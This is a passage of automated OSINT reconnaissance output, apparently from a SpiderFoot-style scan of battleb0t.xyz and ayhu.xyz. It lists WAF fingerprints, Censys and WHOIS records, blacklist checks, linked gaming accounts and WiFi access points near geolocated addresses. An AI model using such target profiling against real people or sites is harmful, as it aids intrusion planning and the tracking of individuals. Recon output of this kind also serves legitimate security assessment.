u'technique': u'Web Protocols', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers' | 34.74.170.74 |
| 2023-05-12 03:01:39 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.164): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:53:02 | Raw Data from RIRs | No | Tool - WAFW00F | 1 | 0 | 2 | 0 | None | [{"url": "https://nwapi.battleb0t.xyz", "firewall": "Cloudflare", "detected": true, "manufacturer": "Cloudflare Inc."}, {"url": "https://nwapi.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] | nwapi.battleb0t.xyz |
| 2023-05-12 03:03:59 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | akashpmani.github.io | 185.199.109.153 |
| 2023-05-12 02:54:22 | HTTP Headers | No | Web Spider | 10 | 0 | 2 | 0 | None | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=u1lyJPU0WioZJ7gW30pw%2F1QYGnEvSi6VguD4iZQLy9JFxNjUYX7Kn2AvbK1RwFeWf6Bc3GtzenDe9QfSS82xeo%2BaVIIeURcDQSNP2UoyOSj%2Fo0e2kf0IgvowllGBeio%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60715ea2423d-EWR", "cross-origin-opener-policy": "same-origin"} | www.ayhu.xyz |
| 2023-05-12 02:54:15 | Linked URL - External | No | Web Spider | 0 | 0 | 3 | 0 | None | https://www.patreon.com/skyhelper | https://nwapi2.battleb0t.xyz/ |
| 2023-05-12 02:54:54 | Raw Data from RIRs | No | Censys | 0 | 0 | 2 | 0 | None | {"last_updated_at": "2023-05-11T12:33:03.766Z", "ip": "2a06:98c1:3121::1", "location_updated_at": "2023-05-06T23:05:13.627091Z", "autonomous_system_updated_at": "2023-05-06T23:05:13.627138Z", "location": {"province": "California", "city": "San Francisco", "country": "United States", "coordinates": {"latitude": 37.7621, "longitude": -122.3971}, "postal_code": "94107", "country_code": "US", "timezone": "America/Los_Angeles", "continent": "North America"}, "dns": {"records": {"karriere-job-booster.com": {"record_type": "AAAA", "resolved_at": "2023-03-23T15:40:36.428770073Z"}, "uncoveryourconfidence.org": {"record_type": "AAAA", "resolved_at": "2023-03-24T20:43:37.500409594Z"}, "question-orthographe.net": {"record_type": "AAAA", "resolved_at": "2022-12-25T11:23:33.248567488Z"}, "kfplastics.com.au": {"record_type": "AAAA", "resolved_at": "2023-04-15T12:22:37.294872821Z"}, "ozvi.net": {"record_type": "AAAA", "resolved_at": "2023-05-07T20:04:48.328410124Z"}, "romainebrain.dev": {"record_type": "AAAA", "resolved_at": "2023-02-18T04:11:46.139927410Z"}, "static.sampledu.com": {"record_type": "AAAA", "resolved_at": "2023-02-01T22:23:03.363402875Z"}, "cpcontacts.madares.app": {"record_type": "AAAA", "resolved_at": "2023-04-16T12:14:57.712576745Z"}, "vadyba.lt": {"record_type": "AAAA", "resolved_at": "2023-03-19T16:29:40.486687881Z"}, "openspeedtest.ovride.net": {"record_type": "AAAA", "resolved_at": "2023-05-07T20:05:02.904720123Z"}, "www.3e-wellness.com": {"record_type": "AAAA", "resolved_at": "2023-05-07T20:03:48.794666765Z"}, "405.hjs.my.id": {"record_type": "AAAA", "resolved_at": "2023-04-12T11:14:59.074372516Z"}, "mail.wolny.poker": {"record_type": "AAAA", "resolved_at": "2022-10-30T17:30:49.591604261Z"}, "dusfer.com": {"record_type": "AAAA", "resolved_at": "2022-12-29T13:18:33.050196113Z"}, "beautybeyondhair.net": {"record_type": "AAAA", "resolved_at": "2023-04-07T18:46:00.761081322Z"}, 
"beautybeyondhair.buzz": {"record_type": "AAAA", "resolved_at": "2023-04-15T12:48:08.422852392Z"}, "wolny.poker": {"record_type": "AAAA", "resolved_at": "2022-10-23T17:07:04.797789596Z"}, "askapkmod.com": {"record_type": "AAAA", "resolved_at": "2022-12-26T12:52:46.077237913Z"}, "gbdfdm.cn": {"record_type": "AAAA", "resolved_at": "2023-02-17T02:28:21.988085793Z"}, "www.cylindermowers.com.au": {"record_type": "AAAA", "resolved_at": "2023-04-15T12:22:39.710895641Z"}, "karriere-job-booster.at": {"record_type": "AAAA", "resolved_at": "2023-04-30T12:17:10.484433310Z"}, "www.wolny.poker": {"record_type": "AAAA", "resolved_at": "2022-10-16T17:06:44.448663582Z"}}, "names": ["www.cylindermowers.com.au", "dusfer.com", "www.wolny.poker", "question-orthographe.net", "kfplastics.com.au", "wolny.poker", "beautybeyondhair.net", "uncoveryourconfidence.org", "romainebrain.dev", "karriere-job-booster.at", "karriere-job-booster.com", "static.sampledu.com", "ozvi.net", "vadyba.lt", "beautybeyondhair.buzz", "cpcontacts.madares.app", "openspeedtest.ovride.net", "405.hjs.my.id", "www.3e-wellness.com", "gbdfdm.cn", "askapkmod.com", "mail.wolny.poker"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://[2a06:98c1:3121::1]/"}, "response": {"body": "<!DOCTYPE html>\n<!--[if lt IE 7]> <html class=\"no-js ie6 oldie\" lang=\"en-US\"> <![endif]-->\n<!--[if IE 7]> <html class=\"no-js ie7 oldie\" lang=\"en-US\"> <![endif]-->\n<!--[if IE 8]> <html class=\"no-js ie8 oldie\" lang=\"en-US\"> <![endif]-->\n<!--[if gt IE 8]><!--> <html class=\"no-js\" lang=\"en-US\"> <!--<![endif]-->\n<head>\n<title>Direct IP access not allowed | Cloudflare</title>\n<meta charset=\"UTF-8\" />\n<meta 
http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\" />\n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=Edge\" />\n<meta name=\"robots\" content=\"noindex, nofollow\" />\n<meta name=\"viewport\" content=\"width=device-width,initial-scale=1\" />\n<link rel=\"stylesheet\" id=\"cf_styles-css\" href=\"/cdn-cgi/styles/main.css\" />\n\n\n<script>\n(function(){if(document.addEventListener&&window.XMLHttpRequest&&JSON&&JSON.stringify){var e=function(a){var c=document.getElementById(\"error-feedback-survey\"),d=document.getElementById(\"error-feedback-success\"),b=new XMLHttpRequest;a={event:\"feedback clicked\",properties:{errorCode:1003,helpful:a,version:1}};b.open(\"POST\",\"https://sparrow.cloudflare.com/api/v1/event\");b.setRequestHeader(\"Content-Type\",\"application/json\");b.setRequestHeader(\"Sparrow-Source-Key\",\"c771f0e4b54944bebf4261d44bd79a1e\");\nb.send(JSON.stringify(a));c.classList.add(\"feedback-hidden\");d.classList.remove(\"feedback-hidden\")};document.addEventListener(\"DOMContentLoaded\",function(){var a=document.getElementById(\"error-feedback\"),c=document.getElementById(\"feedback-button-yes\"),d=document.getElementById(\"feedback-button-no\");\"classList\"in a&&(a.classList.remove(\"feedback-hidden\"),c.addEventListener(\"click\",function(){e(!0)}),d.addEventListener(\"click\",function(){e(!1)}))})}})();\n</script>\n\n<script defer src=\"https://performance.radar.cloudflare.com/beacon.js\"></script>\n</head>\n<body>\n <div id=\"cf-wrapper\">\n <div class=\"cf-alert cf-alert-error cf-cookie-error hidden\" id=\"cookie-alert\" data-translate=\"enable_cookies\">Please enable cookies.</div>\n <div id=\"cf-error-details\" class=\"p-0\">\n <header class=\"mx-auto pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-15 antialiased\">\n <h1 class=\"inline-block md:block mr-2 md:mb-2 font-light text-60 md:text-3xl text-black-dark leading-tight\">\n <span data-translate=\"error\">Error</span>\n <span>1003</span>\n </h1>\n <span class=\"inline-block 
md:block heading-ray-id font-mono text-15 lg:text-sm lg:leading-relaxed\">Ray ID: 7c552e7289ff8729 •</span>\n <span class=\"inline-block md:block heading-ray-id font-mono text-15 lg:text-sm lg:leading-relaxed\">2023-05-10 21:12:37 UTC</span>\n <h2 class=\"text-gray-600 leading-1.3 text-3xl lg:text-2xl font-light\">Direct IP access not allowed</h2>\n </header>\n\n <section class=\"w-240 lg:w-full mx-auto mb-8 lg:px-8\">\n <div id=\"what-happened-section\" class=\"w-1/2 md:w-full\">\n <h2 class=\"text-3xl leading-tight font-normal mb-4 text-black-dark antialiased\" data-translate=\"what_happened\">What happened?</h2>\n <p>You've requested an IP address that is part of the <a href=\"https://www.cloudflare.com/5xx-error-landing/\" target=\"_blank\">Cloudflare</a> network. A valid Host header must be supplied to reach the desired website.</p>\n \n </div>\n\n \n <div id=\"resolution-copy-section\" class=\"w-1/2 mt-6 text-15 leading-normal\">\n <h2 class=\"text-3xl leading-tight font-normal mb-4 text-black-dark antialiased\" data-translate=\"what_can_i_do\">What can I do?</h2>\n <p>If you are interested in learning more about Cloudflare, please <a href=\"https://www.cloudflare.com/5xx-error-landing/\" target=\"_blank\">visit our website</a>.</p>\n </div>\n \n </section>\n\n <div class=\"feedback-hidden py-8 text-center\" id=\"error-feedback\">\n <div id=\"error-feedback-survey\" class=\"footer-line-wrapper\">\n Was this page helpful?\n <button class=\"border border-solid bg-white cf-button cursor-pointer ml-4 px-4 py-2 rounded\" id=\"feedback-button-yes\" type=\"button\">Yes</button>\n <button class=\"border border-solid bg-white cf-button cursor-pointer ml-4 px-4 py-2 rounded\" id=\"feedback-button-no\" type=\"button\">No</button>\n </div>\n <div class=\"feedback-success feedback-hidden\" id=\"error-feedback-success\">\n Thank you for your feedback!\n </div>\n</div>\n\n\n <div class=\"cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center 
sm:text-left border-solid border-0 border-t border-gray-300\">\n <p class=\"text-13\">\n <span class=\"cf-footer-item sm:block sm:mb-1\">Cloudflare Ray ID: <strong class=\"font-semibold\">7c552e7289ff8729</strong></span>\n <span class=\"cf-footer-separator sm:hidden\">•</span>\n <span id=\"cf-footer-item-ip\" class=\"cf-footer-item hidden sm:block sm:mb-1\">\n Your IP:\n <button type=\"button\" id=\"cf-footer-ip-reveal\" class=\"cf-footer-ip-reveal-btn\">Click to reveal</button>\n <span class=\"hidden\" id=\"cf-footer-ip\">2620:96:e000:b0cc:e:2:2:7</span>\n <span class=\"cf-footer-separator sm:hidden\">•</span>\n </span>\n <span class=\"cf-footer-item sm:block sm:mb-1\"><span>Performance & security by</span> <a rel=\"noopener noreferrer\" href=\"https://www.cloudflare.com/5xx-error-landing\" id=\"brand_link\" target=\"_blank\">Cloudflare</a></span>\n \n </p>\n <script>(function(){function d(){var b=a.getElementById(\"cf-footer-item-ip\"),c=a.getElementById(\"cf-footer-ip-reveal\");b&&\"classList\"in b&&(b.classList.remove(\"hidden\"),c.addEventListener(\"click\",function(){c.classList.add(\"hidden\");a.getElementById(\"cf-footer-ip\").classList.remove(\"hidden\")}))}var a=document;document.addEventListener&&a.addEventListener(\"DOMContentLoaded\",d)})();</script>\n</div><!-- /.error-footer -->\n\n\n </div><!-- /#cf-error-details -->\n </div><!-- /#cf-wrapper -->\n\n <script>\n window._cf_translation = {};\n \n \n</script>\n\n</body>\n</html>\n", "_encoding": {"body": "DISPLAY_UTF8", "html_title": "DISPLAY_UTF8", "html_tags": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "html_title": "Direct IP access not allowed | Cloudflare", "protocol": "HTTP/1.1", "body_size": 5906, "body_hashes": ["sha256:81e65e93698a020fe49192d7c9ffa42bda061fb7e5c8ea99e88fffab1636b9d8", "sha1:7d09f1dbda6b2258121e4b32e473c157ec6c1012"], "status_code": 403, "body_hash": "sha1:7d09f1dbda6b2258121e4b32e473c157ec6c1012", "headers": {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": 
"DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "S | 2a06:98c1:3121::1 |
| 2023-05-12 02:53:06 | Raw Data from RIRs | No | Tool - WAFW00F | 1 | 0 | 2 | 0 | None | [{"url": "https://nuke.battleb0t.xyz", "firewall": "Cloudflare", "detected": true, "manufacturer": "Cloudflare Inc."}, {"url": "https://nuke.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] | nuke.battleb0t.xyz |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | lichess (Category: gaming)
https://lichess.org/@/login | login |
| 2023-05-12 02:54:38 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 172.67.168.252 |
| 2023-05-12 02:45:59 | Physical Location | No | AbstractAPI | 0 | 0 | 3 | 0 | None | Chicago, Illinois, 60666, United States, North America | 104.21.71.14 |
| 2023-05-12 02:54:15 | Web Content | No | Web Spider | 4 | 0 | 2 | 0 | None | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<link rel="iron" href="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" sizes="512x512" type="image/png" />
<meta property="og:title" content="SkyHelper API - Documentation" />
<meta property="og:image" content="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" />
<meta property="oh.theme-color" content="#3585d0" />
<meta property="og:description" content="A hypixel skyblock API wrapper containing most features that the SkyHelper bot has to offer." />
<title>SkyHelper API - Documentation</title>
<link rel="stylesheet" href="https://stackedit.io/style.css" />
</head>
<body class="stackedit">
<div class="stackedit__html">
<h1 id="skyhelper-api">SkyHelper API</h1>
<h1 id="authentication">Authentication</h1>
<p>
The SkyHelper API uses its own API keys to authenticate requests. You can either host this API on your own server and define keys there or subscribe to the SkyHelper
<a href="https://www.patreon.com/skyhelper">Patreon</a> (Silver or Gold Supporter) to get an API key from me.<br />
You can either use the key query parameter by adding
<code>?key=token</code> to the end of API requests or use an authorization header by adding an <code>Authorization</code> header to your API requests, where the value of the header is your API
token.
</p>
<h1 id="responses">Responses</h1>
<p>
All endpoints in the API return their responses in JSON. Every request returns a <code>status</code> key, which should match the HTTP status code that was returned, and a
<code>data</code> key for successful responses. A <code>reason</code> key is returned for failed requests.
</p>
<table>
<thead>
<tr>
<th>Status Code</th>
<th>Reason</th>
</tr>
</thead>
<tbody>
<tr>
<td>200</td>
<td>Successful request</td>
</tr>
<tr>
<td>400</td>
<td>
The request is missing an authentication method (valid
<code>key</code> query parameter or an <code>Authentication</code> header)
</td>
</tr>
<tr>
<td>403</td>
<td>The provided token does not exist</td>
</tr>
<tr>
<td>404</td>
<td>There is no player with the given UUID or name or the player has no SkyBlock profiles</td>
</tr>
<tr>
<td>429</td>
<td>
The Hypixel API rate-limit was reached (The API will return
<code>RateLimit-Remaining</code> and <code>RateLimit-Reset</code> headers)
</td>
</tr>
<tr>
<td>500</td>
<td>
There was an error in the SkyHelper API or the Hypixel API returned an unknown error code. Please report these errors back on
<a href="https://github.com/Altpapier/SkyHelperAPI/issues">GitHub</a>
</td>
</tr>
<tr>
<td>502</td>
<td>Hypixel's API is experiencing technical issues or is unavailable</td>
</tr>
<tr>
<td>503</td>
<td>Hypixel's API is in maintenance mode</td>
</tr>
<tr>
<td>504</td>
<td>Hypixel's API returned a <code>Gateway Time-out</code> error</td>
</tr>
</tbody>
</table>
<h1 id="endpoints">Endpoints</h1>
<h3 id="get-v2networth"><code>POST</code> /v2/networth</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>profileData</td>
<td>Object</td>
<td>The profile player data from the Hypixel API (profile.members[uuid])</td>
</tr>
<tr>
<td>bankBalance</td>
<td>Number</td>
<td>The player's bank balance from the Hypixel API (profile.banking?.balance)</td>
</tr>
<tr>
<td>onlyNetworth</td>
<td>Boolean</td>
<td>(default: false) If true, only the networth will be returned</td>
</tr>
</tbody>
</table>
<h3 id="post-v2networthitem"><code>POST</code> /v2/networth/item</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>itemData</td>
<td>Object</td>
<td>The parsed item data of an item from the profiles endpoint</td>
</tr>
</tbody>
</table>
<h3 id="get-v2profilesuser"><code>GET</code> /v2/profiles/:user</h3>
<h3 id="get-v2profileuserprofile"><code>GET</code> /v2/profile/:user/:profile</h3>
<h3 id="get-v1profilesuser"><code>GET</code> /v1/profiles/:user</h3>
<h3 id="get-v1profileuserprofile"><code>GET</code> /v1/profile/:user/:profile</h3>
<h3 id="get-v1profilesuseritems"><code>GET</code> /v1/items/:user</h3>
<h3 id="get-v1profileuserprofileitems"><code>GET</code> /v1/items/:user/:profile</h3>
<h3 id="get-v1fetchur"><code>GET</code> /v1/fetchur</h3>
<table>
<thead>
<tr>
<th>Parameter</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>user</td>
<td>This can be the UUID of a user or the name</td>
</tr>
<tr>
<td>profile</td>
<td>This can be the user's profile ID or name</td>
</tr>
</tbody>
</table>
<h1 id="networthcalculationtypes">Networth Calculation Types</h1>
<p>Types that are used to describe an item's calculation</p>
<table>
<thead>
<tr>
<th>Type</th>
</tr>
</thead>
<tbody>
<tr>
<td>essence</td>
</tr>
<tr>
<td>prestige</td>
</tr>
<tr>
<td>shens_auction</td>
</tr>
<tr>
<td>winning_bid</td>
</tr>
<tr>
<td>enchant</td>
</tr>
<tr>
<td>silex</td>
</tr>
<tr>
<td>wood_singularity</td>
</tr>
<tr>
<td>tuned_transmission</td>
</tr>
<tr>
<td>thunder_charge</td>
</tr>
<tr>
<td>rune</td>
</tr>
<tr>
<td>fuming_potato_book</td>
</tr>
<tr>
<td>hot_potato_book</td>
</tr>
<tr>
<td>dye</td>
</tr>
<tr>
<td>the_art_of_war</td>
</tr>
<tr>
<td>the_art_of_peace</td>
</tr>
<tr>
<td>farming_for_dummies</td>
</tr>
<tr>
<td>recombobulator_3000</td>
</tr>
<tr>
<td>gemstone</td>
</tr>
<tr>
<td>reforge</td>
</tr>
<tr>
<td>master_star</td>
</tr>
<tr>
<td>necron_scroll</td>
</tr>
<tr>
<td>gemstone_chamber</td>
</tr>
<tr>
<td>drill_part</td>
</tr>
<tr>
<td>etherwarp_conduit</td>
</tr>
<tr>
<td>pet_item</td>
</tr>
| nwapi2.battleb0t.xyz |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | BIGO Live (Category: gaming)
https://www.bigo.tv/user/ayhu | ayhu |
| 2023-05-12 03:32:23 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.12:443 | 188.114.97.0/24 |
| 2023-05-12 03:15:36 | Physical Location | No | ipstack | 0 | 0 | 3 | 0 | None | United States | 165.232.113.85 |
| 2023-05-12 02:50:50 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [raw Hybrid Analysis sandbox report dump removed] | 185.199.108.153 |
| 2023-05-12 03:09:49 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 78.170.74.34.bc.googleusercontent.com | 34.74.170.78 |
| 2023-05-12 02:55:28 | BGP AS Membership | No | URLScan.io | 0 | 0 | 2 | 0 | None | 14061 | kekw.battleb0t.xyz |
| 2023-05-12 03:00:32 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | contact@millcityloans.com | [raw Hybrid Analysis sandbox report dump removed] |
| 2023-05-12 02:54:16 | Web Content Type | No | Web Spider | 0 | 0 | 2 | 0 | None | text/html;charset=utf-8 | oldfluid.battleb0t.xyz |
| 2023-05-12 03:03:36 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00root.github.io |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | ConnectionPoint (Net ID: 00:01:E3:0B:31:F9) | 50.1188, 8.6843 |
| 2023-05-12 03:28:39 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.160:443 | 188.114.96.0/24 |
| 2023-05-12 03:24:49 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | United States | dontkillmyapp.com |
| 2023-05-12 03:12:12 | Co-Hosted Site - Domain Whois | No | Whois | 0 | 0 | 4 | 0 | None | Domain:
ply.gg
Domain Status:
Active
Transfer Prohibited by Registrar
Registrant:
Developed Methods LLC
Registrar:
NameCheap, Inc (https://www.namecheap.com)
Relevant dates:
Registered on 21st August 2022 at 15:10:11.713
Registry fee due on 21st August each year
Registration status:
Registered until cancelled
Name servers:
ns1.playit-dns.com
ns2.playit-dns.com
WHOIS lookup made on Fri, 12 May 2023 at 4:12:12 BST
This WHOIS information is provided for free by CIDR, operator of
the backend registry for domain names ending in GG, JE, and AS.
Copyright (c) and database right Island Networks 1996 - 2023.
You may not access this WHOIS server or use any data from it except
as permitted by our Terms and Conditions which are published
at http://www.channelisles.net/legal/whoisterms
They include restrictions and prohibitions on
- using or re-using the data for advertising;
- using or re-using the service for commercial purposes without a licence;
- repackaging, recompilation, redistribution or reuse;
- obscuring, removing or hiding any or all of this notice;
- exceeding query rate or volume limits.
The data is provided on an 'as-is' basis and may lag behind the
register. Access may be withdrawn or restricted at any time.
| ply.gg |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Capsmanagement (Net ID: 00:01:21:1C:AD:50) | 41.8781, -87.6298 |
| 2023-05-12 03:33:13 | Web Content Language | No | Language Detector | 0 | 0 | 4 | 0 | None | English | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f8c59d97743e3')"></div>
<form id="challenge-form" action="/lol.html?__cf_chl_f_tk=s7qF6ZO3cVvdEEZa_WmCMPM6sxOwT7Q8EvJA4xw7FTE-1683861861-0-gaNycGzNChA" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="[opaque base64 challenge token removed]">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '89417',
cRay: '7c5f8c59d97743e3',
cHash: 'd514be865123f26',
cUPMDTk: "\/lol.html?__cf_chl_tk=s7qF6ZO3cVvdEEZa_WmCMPM6sxOwT7Q8EvJA4xw7FTE-1683861861-0-gaNycGzNChA",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei9sb2wuaHRtbA==',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: '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',
t: 'MTY4Mzg2MTg2MS40MTQwMDA=',
m: 'cETLdgv65AVfRnLUKPe0Cd6r3wJgEhjfW5wAN2YKd/o=',
i1: 'w+O5Ul3LVrlFQJyL4ELS5Q==',
i2: 'eUom9RfWfCbkQbM7K2vx8A==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f8c59d97743e3');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f8c59d97743e3';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/lol.html?__cf_chl_rt_tk=s7qF6ZO3cVvdEEZa_WmCMPM6sxOwT7Q8EvJA4xw7FTE-1683861861-0-gaNycGzNChA" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 02:44:14 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | github.com | www.battleb0t.xyz |
| 2023-05-12 02:55:05 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | CloudFlare CloudFlare Load Balancer | 188.114.97.1 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | zoom1330 (Net ID: 00:01:38:92:E5:07) | 37.7813933,-122.3918002 |
| 2023-05-12 03:31:33 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | pw-55286b4dad8e2523890cab5484722bf1@privacyguardian.org | Domain Name: AAHU.XYZ
Registry Domain ID: D289905874-CNIC
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2022-06-06T11:23:48.0Z
Creation Date: 2022-04-10T16:51:06.0Z
Registry Expiry Date: 2024-04-10T23:59:59.0Z
Registrar: NameSilo, LLC
Registrar IANA ID: 1479
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: autoRenewPeriod https://icann.org/epp#autoRenewPeriod
Registrant Organization: See PrivacyGuardian.org
Registrant State/Province: AZ
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: LINDA.NS.GIANTPANDA.COM
Name Server: VIVIAN.NS.GIANTPANDA.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@namesilo.com
Registrar Abuse Contact Phone: +1.4805240066
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:36.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
